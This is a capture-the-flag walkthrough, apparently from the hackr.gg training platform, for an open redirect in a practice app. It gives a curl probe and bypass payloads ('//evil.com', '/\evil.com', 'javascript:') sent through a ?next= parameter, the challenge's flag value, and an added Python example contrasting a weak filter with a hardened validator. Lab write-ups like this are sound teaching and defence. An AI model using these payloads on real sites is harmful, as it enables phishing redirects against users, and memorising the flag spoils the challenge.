hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Crapazon — Open Redirect

Open Redirect
Difficulty: Beginner
Vuln class: Open Redirect
Steps: 3
// Objective
Abuse the redirect parameter to send a user to an arbitrary external URL and retrieve the flag.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Find the redirect parameter
After login, Crapazon uses a ?next= parameter to redirect you back to the page you came from. Test whether it accepts external URLs.
Command / Input
curl -I "http://TARGET/login?next=https://evil.com"
Output
HTTP/1.1 302 Found
Location: https://evil.com
If the redirect goes to evil.com, the parameter is unvalidated — open redirect confirmed.
2. Bypass common filters
If https://evil.com is blocked, try common bypasses: //evil.com, /\evil.com, or ?next=javascript:void(0).
Command / Input
http://TARGET/login?next=//evil.com
http://TARGET/login?next=/\evil.com
3. Retrieve the flag
Use the working redirect payload — the flag is served when the redirect executes successfully.
Command / Input
GET /login?next=https://evil.com
Output
HackrGG{0p3n_r3d1r3ct_url_byp4ss3d}
The flag appears in the response headers or body upon successful redirect.
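Why steps 1 and 2 work, and what a fixed ?next= handler looks like, as an added example that is not part of the original walkthrough and not Crapazon's code. It places the kind of prefix filter that blocks "https://evil.com" but lets "//evil.com", "/\evil.com" and "javascript:void(0)" through next to a hardened validator that only accepts a same-site path. The host name crapazon.example and the function names are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Constructed sample host for the example; the page only refers to TARGET.
SITE_HOST = "crapazon.example"


def naive_is_safe(next_url: str) -> bool:
    """The weak filter step 2 gets around: it only rejects an explicit
    http(s):// prefix, so scheme-relative, backslash and javascript:
    values all pass."""
    return not next_url.lower().startswith(("http://", "https://"))


def hardened_is_safe(next_url: str) -> bool:
    """Accept only an absolute path on this site (e.g. '/account/orders').

    Rejects anything browsers would resolve off-site:
      - any scheme (https:, javascript:, data:)
      - any authority ('//evil.com', and '///evil.com', which browsers
        collapse to '//evil.com')
      - backslashes, which browsers treat like forward slashes
      - control characters (tab/newline are stripped by browser parsers)
    """
    if not next_url:
        return False
    if "\\" in next_url or any(ord(c) < 0x20 for c in next_url):
        return False
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:
        return False
    # Must be a single-slash absolute path; '//...' is scheme-relative.
    return next_url.startswith("/") and not next_url.startswith("//")


def resolve_redirect(next_url: str, default: str = "/") -> str:
    """Value the Location header should carry: the validated same-site
    path, or the default landing page when ?next= is not safe."""
    return next_url if hardened_is_safe(next_url) else default


if __name__ == "__main__":
    # Constructed inputs: the three payloads from the walkthrough plus a benign one.
    for candidate in ["https://evil.com", "//evil.com", "/\\evil.com",
                      "javascript:void(0)", "/account/orders"]:
        print(f"{candidate!r:24} naive={naive_is_safe(candidate)!s:5} "
              f"hardened={hardened_is_safe(candidate)!s:5} "
              f"Location={resolve_redirect(candidate)}")
```

The hardened check deliberately does not try to normalise or "clean" the value; any input that is not plainly a same-site path falls back to the default, which is simpler to reason about than a denylist. If the application genuinely needs to redirect off-site, compare urlsplit(...).netloc against an explicit allowlist of hosts rather than extending the prefix filter.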
// Flag
Flag value: HackrGG{0p3n_r3d1r3ct_url_byp4ss3d}
Returned when a valid redirect to an external URL is triggered.